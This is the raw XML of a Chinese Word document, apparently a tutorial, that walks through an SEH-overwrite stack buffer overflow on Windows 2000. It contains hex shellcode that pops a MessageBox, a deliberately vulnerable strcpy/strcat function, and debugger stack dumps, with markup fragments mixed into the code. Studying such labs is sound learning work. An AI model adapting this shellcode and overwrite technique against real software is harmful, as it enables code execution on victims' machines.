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 attack_SEH.cpp : 定义控制台应用程序的入口点。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&lt;stdafx.h&gt;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#include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&lt;string.h&gt;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shellcode[] =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"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"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"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"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"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"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"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"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"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"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"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"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"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"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"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"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"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"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"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"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"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"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"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"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"\x90\x90\x90\x90"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800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"\xA0\xFE\x12\x00"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//address of shellcode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test(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* input)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__asm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int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3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</w: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char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buf[200];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strcpy(buf, input);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strcat(buf, input);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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w: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 xml:space="preserve"> main()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{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ab/>
        <w:t>test(shellcode);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kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11372" w:rsidRDefault="00C11372" w:rsidP="00C11372">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00046602" w:rsidRDefault="00C11372">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到代码后，按照第一篇写的设置VS，我的win</w:t>
      </w:r>
      <w:r>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装不了VS，所以我在win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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>下安装了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11372" w:rsidRDefault="00C11372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是生成的exe还是在win</w:t>
      </w:r>
      <w:r>
        <w:t>2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下运行，不然</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safeSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有影响</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11372" w:rsidRDefault="00C11372">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在如图所示位置下个断点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11372" w:rsidRDefault="00C11372">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="26790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5EA" w:rsidRDefault="00C11372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elease版本的走起来</w:t>
      </w:r>
      <w:r w:rsidR="009215EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到生成Security</w:t>
      </w:r>
      <w:r w:rsidR="009215EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009215EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie的代码，同时注意EAX和EBP，右下角我已经跳到了Security</w:t>
      </w:r>
      <w:r w:rsidR="009215EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009215EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie的位置了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11372" w:rsidRDefault="009215EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="26758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5F" w:rsidRDefault="009215EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后往下看，可以看到这里是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，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B465F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B465F">
        <w:t>:[ebp+8]</w:t>
      </w:r>
      <w:r w:rsidR="008B465F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是参数，也就是传进去shellcode的指针，然后第二个是目的地址，也就是在最开始开辟的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B465F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B465F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间的起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009215EA" w:rsidRDefault="009215EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2673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5F" w:rsidRPr="008B465F" w:rsidRDefault="008B465F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们先把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布局复制下来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FE94   003425B8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FE98   00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FE9C   000001F6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEA0   00340000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEA4   000001DD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEA8   00343098</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEAC   00343090</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEB0   00340168</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEB4   77FCCCA4  返回到 ntdll.77FCCCA4 来自 ntdll.77F83235</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEB8   00340000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEBC   00343090</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEC0   00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEC4   00343098</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEC</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>8  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0012FF0C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t xml:space="preserve">0012FECC  |00405342  返回到 attack_S.00405342 来自 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdll.RtlSizeHeap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FED</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00340000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FED</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FED8  |0040534B  返回到 attack_S.0040534B 来自 attack_S.00402799</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>FEDC  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0BF59A7E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00343098</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00343098</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>8  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>FEEC  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0012FF2C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>77F81F55  ntdll.77F81F55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0012FEDC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FEF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>8  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0012FF60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>FEFC  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00000004</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>00  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00000004</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF04  |00402193  返回到 attack_S.00402193</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0012FF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>08  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00000001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>C  \</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00402147  attack_S.00402147</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF10   00402D9C  返回到 attack_S.00402D9C 来自 attack_S.0040216B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF14   0034309C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t xml:space="preserve">0012FF18   00402A93  返回到 attack_S.00402A93 来自 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdll.RtlLeaveCriticalSection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF1C   0040B</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>608  attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_S.0040B608</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF20   0012FF60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF24   004014A0  返回到 attack_S.004014A0 来自 attack_S.00402A80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF28   00000008</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF2C   00402E18  返回到 attack_S.00402E18 来自 attack_S.00401499</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF30   00402E12  返回到 attack_S.00402E12 来自 attack_S.00402799</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF34   0BF59A12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF38   00000893</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF3C   00000002</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF40   77E63D</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>36  KERNEL32.GetProcessHeap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t xml:space="preserve">0012FF44   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>00402147  attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_S.00402147</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF48   0012FF34</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF4C   49656E69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF50   0012FFB0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF54   004027B</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0  attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_S.004027B0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF58   0BA7F6BA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF5C   FFFFFFFE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF60   0BF59A16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>64  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0012FF70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF68  |0040721D  返回到 attack_S.0040721D 来自 attack_S.004071C0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F" w:rsidP="008B465F">
      <w:r>
        <w:t>0012FF6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>C  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0040ACA0  attack_S.0040ACA0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们运行到call之前，可以看到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里面两个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="268160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5F" w:rsidRDefault="008B465F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行之后就会溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B465F" w:rsidRDefault="008B465F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2273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5F" w:rsidRDefault="008B465F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是我们观察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的布局，发现shellcode的长度不够，并没有覆盖S.E.H，所以我们修改一下长度，这个长度根据你的</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机确定，但是不着急，顺便修改一下覆盖S</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H的值，可以看到，目的地址是0x</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:t>0012FE94</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么我们就需要用这个指针来覆盖S</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A11A66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H，这样处理异常的时候就会直接执行shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11A66" w:rsidRDefault="00A11A66">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2835275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73D" w:rsidRPr="00A11A66" w:rsidRDefault="00A11A66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然这只是作为例子来演示，在实际的攻击中用固定地址是几乎不可能成功的事，因为每台pc都不一样，你怎么确定每次的buff地址都是我们这次设置的值？</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0080773D" w:rsidRPr="00A11A66" w:rsidSect="00663BA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A30"/>
    <w:rsid w:val="00046602"/>
    <w:rsid w:val="0005373C"/>
    <w:rsid w:val="0080773D"/>
    <w:rsid w:val="008B465F"/>
    <w:rsid w:val="009215EA"/>
    <w:rsid w:val="009D2A30"/>
    <w:rsid w:val="00A11A66"/>
    <w:rsid w:val="00C1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E258A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E936FF1D-3E2E-4BAB-9953-73DBE5CB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zhixian wang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhixian wang</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-24T04:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-24T06:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>